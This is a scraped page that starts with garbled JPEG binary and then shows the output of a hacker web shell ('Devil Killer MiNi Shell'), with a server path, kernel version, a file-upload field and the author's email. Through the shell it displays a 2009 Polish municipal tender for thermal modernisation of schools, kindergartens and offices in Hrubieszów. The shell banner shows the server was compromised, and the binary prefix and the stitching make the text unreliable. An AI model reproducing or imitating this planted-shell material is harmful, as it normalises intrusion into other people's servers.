JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090820/137227-N-2009.html

<p class="kh_header"><b>Hrubieszów: Termomodernizacja budynków użyteczności publicznej Gminy Miejskiej Hrubieszów realizowanych w ramach projektu: Odnawialne źródła energii  i termomodernizacja budynków użyteczności publicznej w Powiecie Hrubieszów</b><br>
<b>Numer ogłoszenia: 137227 - 2009; data zamieszczenia: 20.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków użyteczności publicznej Gminy Miejskiej Hrubieszów realizowanych w ramach projektu: Odnawialne źródła energii  i termomodernizacja budynków użyteczności publicznej w Powiecie Hrubieszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania są roboty budowlane w zakresie termomodernizacji 11 budynków użyteczności publicznej Gminy Miejskiej Hrubieszów.   
Zakresem robót objęte są niżej wymienione budynki:

1.	Przedszkole Nr. 1 przy ulicy Piłsudskiego 59  w Hrubieszowie 
1. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 14 cm - 443,44 m2
2. Ocieplenie stropodachów wentylowanych metodą wdmuchania materiału    
    termoizolacyjnego np. ekofibru lub granulatu wełny mineralnej warstwą o grubości 14 cm-   
    432,62 m2
3. Wymiana okien i drzwi na drzwi i okna o współczynniku U = 1,3 W/m2K okna 54 szt., i 
    drzwi 6 szt. - 255,96 i 20,6 m2 
4. Całkowita wymiana instalacji centralnego ogrzewania- 1 kpl

2.	Przedszkole nr. 2 przy ulicy  Hubala 11 w Hrubieszowie 
1. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 14 cm- 591,33 m2
2. Ocieplenie stropodachów wentylowanych metodą wdmuchania materiału  
    termoizolacyjnego np. ekofibru lub granulatu wełny mineralnej warstwą o grubości 14 cm-  
    794,86 m2
3. Wymiana okien i drzwi na drzwi i okna o współczynniku U = 1,3 W/m2K okna 75 szt., i 
     drzwi 5 szt.- 225,45 i 13,20 m2
4. Całkowita wymiana instalacji centralnego ogrzewania- 1 kpl


3.	Przedszkole nr. 5 przy ulicy  Listopadowej  4 w Hrubieszowie 
1. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 14 cm- 443,33 m2
2. Ocieplenie stropodachów wentylowanych metodą wdmuchania materiału 
     termoizolacyjnego np. ekofibru lub granulatu wełny mineralnej warstwą o grubości 14   
     cm- 432,62 m2 
3. Wymiana okien i drzwi na drzwi i okna o współczynniku U = 1,3 W/m2K okna 54szt., i 
     drzwi 6 szt.- 255,96 i 20,60 m2
4. Całkowita wymiana instalacji centralnego ogrzewania1 kpl



4.	Zespół Szkół Nr. 1  przy ulicy  Listopadowej 12 w Hrubieszowie ( Szkoła Podstawowa + Gimnazjum)
1. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 12 cm- 1900,51 m2
2. Ocieplenie ścian zewnętrznych piwnic w ziemi warstwą styropianu o grubości 10 cm -  
    347,1 m2
3. Ocieplenie stropodachów wentylowanych metodą wdmuchania materiału   
     termoizolacyjnego np. ekofibru lub granulatu wełny mineralnej warstwą o grubości 14 
     cm- 1351,61 m2
4. Wymiana okien i drzwi na drzwi i okna o współczynniku U = 1,3 W/m2K, okna - 231 szt.,  
    i drzwi 7 szt.- 662 i 13,2 kpl
5. Całkowita wymiana instalacji centralnego ogrzewania 1 kpl

5.	Zespół Szkół Nr. 3 przy ulicy  Zamojskiej 16 w Hrubieszowie (Szkoła Podstawowa + Gimnazjum) 
 1. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 12 cm- 2722,27 m2
 2. Ocieplenie ścian zewnętrznych piwnic w ziemi warstwą styropianu o grubości 10 cm-  
     220,9 m2
 3. Ocieplenie stropodachów wentylowanych metodą wdmuchania materiału  
     termoizolacyjnego np. ekofibru lub granulatu wełny mineralnej warstwą o grubości 14 
     cm1786,5 m2
4.	Ocieplenie stropodachów niewentylowanych warstwą styropapy o grubości 12 cm
     767,62  m2
 5. Wymiana okien i drzwi na drzwi i okna o współczynniku U = 1,3 W/m2K okna 227 szt., i 
    drzwi - 5 szt. - 985,62 i 14,08 m2
 6. Likwidacja luksferów z zastąpieniem ich w 50% powierzchni oknami o współczynniku U  
     =  1,3 W/m2K i zamurowaniem pozostałych 50% gazobetonem z ociepleniem- 18,9 m2
7.Całkowita wymiana instalacji centralnego ogrzewania1 kpl


6.	Zespół Szkół  Nr. 2 przy ulicy  Żeromskiego 29 w Hrubieszowie (Szkoła Podstawowa + Gimnazjum)
1. Ocieplenie stropu poddasza warstwą wełny mineralnej o grubości 18 cm  - 910,00 m2 
2. Dokończenie wymiany stolarki okiennej okna - 17 szt. - 61,40 m2 
3. Ocieplenie ścian przy gruncie warstwą styropianu o grubości 8 cm- 59 m2 
4. Ocieplenie ścian zewnętrznych oraz piwnic budynku warstwą styropianu o grubości 9 cm / 
     35 m 2 / i 10 cm / 1360 m 2 - 1395 m2
5. Wymiana drzwi zewnętrznych 1szt. - 3,2 m2 
6.Modernizacja instalacji centralnego ogrzewania - wymiana starej niesprawnej instalacji   
   wewnętrznej, montaż grzejników, montaż zaworów termostatycznych   1 kpl


7.	Budynek administracyjny  Gminy Miejskiej Hrubieszów przy  ulicy  3-go Maja 15  w   Hrubieszowie 
1. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 12 cm - 745,1 m2 
2. Ocieplenie stropu pod poddaszem metodą wyłożenia materiału termoizolacyjnego n.p. 
     wełny mineralnej warstwą o grubości 15 cm - 748,26 m2
3. Wymiana okien i drzwi na drzwi i okna o współczynniku U = 1,3 W/m2K okna 47 szt., i  
    drzwi - 4 szt. - 110,4 i 14,5 m2 
4. Regulacja instalacji centralnego ogrzewania kpl. 1





8.	Przedszkole nr. 3 przy ulicy  Dwernickiego 24 w Hrubieszowie 
1. Ocieplenie stropodachu  warstwą wełny mineralnej granulowanej o grubości 15 cm 
     - 590 m2
2. Wymiana stolarki okiennej na nową o wsp. U<=1,5  okna - 41 szt. - 89,1 m2
3. Wymiana drzwi zewnętrznych na nowe o wsp. U<=2,0, drzwi - 4 szt. - 8,4 m2
4. Ocieplenie ścian zewnętrznych  budynku warstwą styropianu o grubości 14 cm- 450 m2
5. Modernizacja instalacji centralnego ogrzewania, (wymiana starej niesprawnej instalacji  
    wewnętrznej, montaż grzejników, montaż zaworów termostatycznych - kpl. 1

9.	Przedszkole nr. 3 - filia przy ulicy  Grotthusów 1 w Hrubieszowie 
1. Ocieplenie stropodachu  warstwą wełny mineralnej granulowanej o grubości 16 cm 
    - 196 m2
2. Wymiana stolarki okiennej na nową o wsp. U<=1,5  okna - 13 szt. - 26,3 m2
3. Wymiana drzwi zewnętrznych na nowe o wsp. U<=2,0, drzwi - 1 szt. - 4,1 m2 zł
4. Ocieplenie ścian zewnętrznych  budynku warstwą styropianu o grubości 14 cm- 295 m2
5.	Modernizacja instalacji centralnego ogrzewania, (wymiana starej niesprawnej instalacji wewnętrznej, montaż grzejników, montaż zaworów termostatycznych) - kpl.
10.	Przedszkole Nr. 1 - filia przy ulicy  Gródeckiej   48  w Hrubieszowie 
1. Ocieplenie ścian zewnętrznych szczytowych warstwą styropianu o grubości 12 cm - 7
     72,80m2 
2. Ocieplenie ścian zewnętrznych podłużnych warstwą styropianu o grubości 12 cm 
    - 168,33 m2
3. Wymiana okien i drzwi na drzwi i okna o współczynniku U = 1,3 W/m2K okna 11 szt., i 
     drzwi 2 szt., - 27,26 i 2,2 m2
4.Całkowita wymiana instalacji centralnego ogrzewania - kpl. 1

11.	Hrubieszowski Dom Kultury - ul. 3-Maja 7 w Hrubieszowie 
1. Ocieplenie ścian zewnętrznych warstwą styropianu o grubości 14 cm -1629 m2 
2. Ocieplenie stropodachu  warstwą wełny mineralnej granulowanej o grubości 15 cm
    - 923,9 m2 - 
3. Ocieplenie dachu Sali widowiskowej styropapą o grubości 15 cm - 683,7 m2 
4. Ocieplenie stropu nad wejściem warstwą styropianu o grubości 14 cm - 60,81 m2 
5. Wymiana drzwi na nowe o wsp. U<=2 i wymiana okien na nowe o współczynniku  
    U<=1,3Wm2k - drzwi - 74,1m2  i okna 376,7 m2 
6. Wymiana instalacji c.o. (grzejniki płytowe, zawory termostatyczne)- 1kpl. 

Szczegółowy zakres robót określają: specyfikacje techniczne  wykonania i odbioru robót, dokumentacje projektowe, Harmonogram przedsięwzięcia oraz kosztorysy ofertowe dla poszczególnych budynków, stanowiące integralną część SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.10.00-4, 45.26.13.20-3, 45.42.10.00-4, 45.32.10.00-3, 45.33.11.00-7, 45.11.30.00-2, 45.45.30.00-7, 45.26.21.00-2, 45.32.00.00-6, 45.40.00.00-1, 45.44.21.20-4, 45.30.00.00-0, 45.33.11.00-7, 45.33.12.10-1, 45.31.00.00-3, 45.33.11.00-7, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości  200.000 zł. (słownie: dwieście tysięcy zł.)
Wadium należy wnieść w terminie do dnia 14.09.09 do godz. 13.00
2.	Wadium można wnieść w jednej lub kilku następujących formach:
a)	W pieniądzu - wyłącznie na konto Zamawiającego PEKAO S.A. I O/Hrubieszów  
  Nr 66 12 40 28 29 1111 0000 4027 0267 z dopiskiem  wadium do przetargu  Nr 
  ZP.341-12/09 - o wniesieniu wadium decyduje moment wpływu wadium na rachunek   
  zamawiającego. Dowód wpłacenia wadium można dołączyć do oferty lub przedłożyć  
  komisji przetargowej w dniu przetargu. 
b)	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   kredytowej z tym, że poręczenie kasy jest poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości(Dz. U. Nr 109 poz. 1158, z późn. zm.)





UWAGA!
W przypadku składnia wadium w innej formie niż pieniężna dokument powinien zawierać zapis, że istnieje możliwość zatrzymania wadium w przypadkach określonych Ustawą prawo zamówień publicznych- Art. 46 ust.4a, 46 ust.5<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca składający ofertę musi spełniać następujące warunki:
a)	Posiadać uprawnienia do wykonania zamówienia 
b)	Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia na czas realizacji zamówienia tj. 
Wykonawca przedstawi w ofercie, kandydatów na każde stanowisko:
Kierownik Budowy- niniejsza osoba ma posiadać następujące kwalifikacje:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów Powinien posiadać co najmniej 5-letnie doświadczenie zawodowe, w tym co najmniej 3-letnie doświadczenie jako kierownik budowy. Kierownik Robót w branży budowlanej - niniejsza osoba ma posiadać następujące kwalifikacje:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów Powinien posiadać co najmniej 5-letnie doświadczenie zawodowe, w tym co najmniej 3-letnie doświadczenie jako kierownik budowy lub kierownik robót
Kierownik Robót w branży sanitarnej - niniejsza osoba ma posiadać następujące kwalifikacje:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sanitarnej  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów Powinien posiadać co najmniej 5-letnie doświadczenie zawodowe, w tym co najmniej 3-letnie doświadczenie jako kierownik budowy lub kierownik robot
Kierownik Robót  w branży elektrycznej  - niniejsza osoba ma posiadać następujące kwalifikacje:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów Powinien posiadać co najmniej 5-letnie doświadczenie zawodowe, w tym co najmniej 3-letnie doświadczenie jako kierownik budowy lub kierownik robót

Dla każdej osoby proponowanej przez Wykonawcę  na powyższe stanowiska należy załączyć kopie uprawnień budowlanych oraz dokument potwierdzający przynależność do Polskiej Izby Inżynierów Budownictwa oraz posiadanie wymaganego ubezpieczenia, a także przedłożyć życiorys zawodowy potwierdzający spełnianie wymagań określonych powyżej, zawierający informacje nt. realizowanych inwestycji z podaniem inwestora, nazwy zadania, okresu realizacji z podaniem dat w układzie miesiąc-rok.

c)	Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - na potwierdzenie czego należy przedstawić informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na łączną kwotę co najmniej  3,0 mln zł, dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert.

 
d)	Wykonawca musi wykazać się wykonaniem w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -  wykonaniem robót polegających na budowie, przebudowie, rozbudowie lub modernizacji  3 obiektów użyteczności publicznej w zakresie: elewacji budynku, dachu, instalacji c.o. , montażu stolarki okiennej i drzwiowej, z czego przynajmniej jedno zadanie o wartości nie mniejszej niż 7,5mln zł. brutto,  zrealizowane w ramach środków finansowych  Unii Europejskiej
e)	Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w tym objętej przedmiotem zamówienia na równowartość co najmniej 3,5 mln zł; 
f)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że spełniają wyżej opisane warunki łącznie, z tym ,że Lider Konsorcjum musi wykazać że jedno zadanie o wartości nie mniejszej niż 7,5mln zł. brutto,  zrealizował w ramach środków finansowych Unii Europejskiej. Lider musi  posiadać rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na łączną kwotę co najmniej  2,0 mln zł, dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert 
g)	Nie podlegać wykluczeniu z postępowania o udzielenie zamówienia 
h)	Spełniać wszystkie wymagania określone ustawą Prawo zamówień publicznych oraz niniejszą Specyfikacją.

Ocena spełnienia przez Wykonawcę powyższych warunków będzie dokonana przy zastosowaniu kryterium spełnia - nie spełnia. - podstawą do oceny ofert będą złożone dokumenty wykazane w pkt. VIII  1.1. do 1.12   SIWZ).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu oraz inne dokumenty wymagane od wykonawców:
. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, każdy z   
    Wykonawców powinien przedłożyć wraz z ofertą następujące dokumenty:
1.1.	wypełniony formularz ofertowy (załącznik nr 1),
1.2.	aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert),
1.3.	aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem składania ofert,
1.4.	Oświadczenie w trybie Art. 22 ust.1 załącznik nr 6
1.5.	wykaz osób i podmiotów, które będą wykonywać zamówienie wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, przedstawiony na załączniku nr 4, oraz odpis lub kopia uprawnień oraz zaświadczenie o przynależności do Izby Inżynierów Budownictwa oraz posiadanie wymaganego ubezpieczenia, a także przedłożyć życiorys zawodowy potwierdzający spełnianie wymagań określonych powyżej, zawierający informacje nt. realizowanych inwestycji z podaniem inwestora, nazwy zadania, okresu realizacji z podaniem dat w układzie miesiąc-rok.


1.6.	oświadczenie złożone na formularzu ofertowym (załącznik nr 1), że prace objęte zamówieniem Wykonawca wykona we własnym zakresie lub w przypadku uczestnictwa podwykonawców przedstawienie zakresu robot powierzonego podwykonawcy na  załączniku nr 5,
1.7.	wykaz zrealizowanych robót -   załącznik nr 9
1.8.	referencje potwierdzające zrealizowanie robót ujętych w załączniku nr.9 
1.9.	kosztorysy ofertowe - uproszczone -  załączniki nr 2
1.10.	zaakceptowany wzór umowy załącznik nr 3 
1.11.	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których     
  Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków  
  finansowych lub zdolność kredytową wykonawcy na łączną kwotę co najmniej  3,0 mln zł, 
  dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu  
  składania ofert 
1.12.	Dokument  ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej        działalności gospodarczej, w tym objętej przedmiotem zamówienia na równowartość co  najmniej 3,5 mln zł;  
2.	Zamawiający może wezwać w wyznaczonym przez siebie terminie do uzupełnienia dokumentów potwierdzających spełnienie warunków udziału w postępowaniu zgodnie z art.26.3 ustawy pzp, lub może wezwać do złożenia wyjaśnień zgodnie z art.26.4
3.	Dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem potwierdzające spełnienie przez wykonawcę warunków udziału w postępowaniu powinny być załączone do składnej oferty.
4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego mają obowiązek załączyć do oferty dokument pełnomocnictwa uprawniający do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego lub uprawniający do reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego.
5.	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące Wykonawcy, o których mowa w pkt. VIII od pkt. 1.2do pkt. 1.4 SIWZ
6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium   
       Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej:
1)w pkt.1.2  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2) Dokument, o którym mowa w pkt 1) lit. a, powinien być wystawiony nie wcześniej      
niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do
    udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę 
lub miejsce zamieszkania, nie wydaje się dokumentów, o których powyżej mowa,                          zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Hrubieszowie - Wydział Gospodarki Mieniem Komunalnym i Ochrony Środowiska - ul. 3-go Maja 15 ( tel. 084 696 2380 w.56).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 13:00, miejsce: Gmina Miejska Hrubieszów - sekretariat
ul. Mjr H. Dobrzańskiego Hubala 1
22-500 Hrubieszów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PLANOWANE ZRÓDŁA WSPÓŁFINANSOWANIA:
1.	Narodowy Funduszu Ochrony Środowiska i Gospodarki Wodnej
2.	Fundusz Spójności w ramach Programu Operacyjnego Infrastruktura

Creat By MiNi SheLL
Email: jattceo@gmail.com